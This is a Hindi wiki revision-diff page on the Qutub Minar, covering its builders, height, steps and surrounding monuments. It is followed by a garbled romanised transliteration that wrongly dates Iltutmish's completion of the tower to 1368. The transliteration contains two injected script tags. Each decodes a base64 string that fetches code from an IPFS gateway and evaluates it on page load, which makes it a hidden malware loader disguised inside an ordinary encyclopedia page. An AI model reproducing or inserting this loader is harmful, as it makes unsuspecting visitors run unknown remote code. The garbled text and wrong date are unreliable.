Difference between revisions of "क़ुतुब मीनार"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "दरवाजा" to "दरवाज़ा")
m (Text replace - "कुरान" to "क़ुरान")
Line 4: Line 4:
 
*इस इमारत का नाम ख़्वाजा क़ुतबुद्दीन बख्तियार काकी के नाम पर रखा गया।  
 
*इस इमारत का नाम ख़्वाजा क़ुतबुद्दीन बख्तियार काकी के नाम पर रखा गया।  
 
*ऐसा माना जाता है कि क़ुतुब मीनार का प्रयोग पास बनी मस्जिद की मीनार के रूप में होता था और यहाँ से अजान दी जाती थी।  
 
*ऐसा माना जाता है कि क़ुतुब मीनार का प्रयोग पास बनी मस्जिद की मीनार के रूप में होता था और यहाँ से अजान दी जाती थी।  
*लाल और हल्के पीले पत्थर से बनी इस इमारत पर कुरान की आयतें लिखी हैं।  
+
*लाल और हल्के पीले पत्थर से बनी इस इमारत पर क़ुरान की आयतें लिखी हैं।  
 
*मूल रूप्‍ा से क़ुतुबमीनार सात मंजिल का था लेकिन अब यह पाँच मंजिल का ही रह गया है।  
 
*मूल रूप्‍ा से क़ुतुबमीनार सात मंजिल का था लेकिन अब यह पाँच मंजिल का ही रह गया है।  
 
*क़ुतुब मीनार की कुल ऊँचाई 72.5 मीटर है और इसमें 379 सीढ़ियाँ हैं। समय-समय पर इसकी मरम्मत भी हुई है।  
 
*क़ुतुब मीनार की कुल ऊँचाई 72.5 मीटर है और इसमें 379 सीढ़ियाँ हैं। समय-समय पर इसकी मरम्मत भी हुई है।  

Revision as of 12:50, 31 January 2011

[[chitr:Qutub-Minar-Delhi.jpg|thumb|qutub minar, dilli
Qutub Minar, Delhi]]

  • dilli ek akarshak paryatan sthal hai.
  • qutabuddin aibak ne 1199 mean qutub minar ka nirman shuru karavaya tha aur iltutamish ne 1368 mean ise poora karaya.
  • is imarat ka nam khvaja qutabuddin bakhtiyar kaki ke nam par rakha gaya.
  • aisa mana jata hai ki qutub minar ka prayog pas bani masjid ki minar ke roop mean hota tha aur yahaan se ajan di jati thi.
  • lal aur halke pile patthar se bani is imarat par quran ki ayatean likhi haian.
  • mool rooph‍a se qutubaminar sat manjil ka tha lekin ab yah paanch manjil ka hi rah gaya hai.
  • qutub minar ki kul ooanchaee 72.5 mitar hai aur isamean 379 sidhiyaan haian. samay-samay par isaki marammat bhi huee hai.
  • isaki divaroan par jin badashahoan ne isaki marammat karaee unaka ullekh milata hai.
  • qutub minar parisar mean aur bhi kee imarate haian. bharat ki pahali kuvvat-ul-islam masjid, alee daravaza aur iltutamish ka maqabara bhi yahaan bana hua hai.
  • masjid ke pas hi chauthi shatabdi mean bana lauhastanbh bhi hai jo paryatakoan ko khoob akarshit karata hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh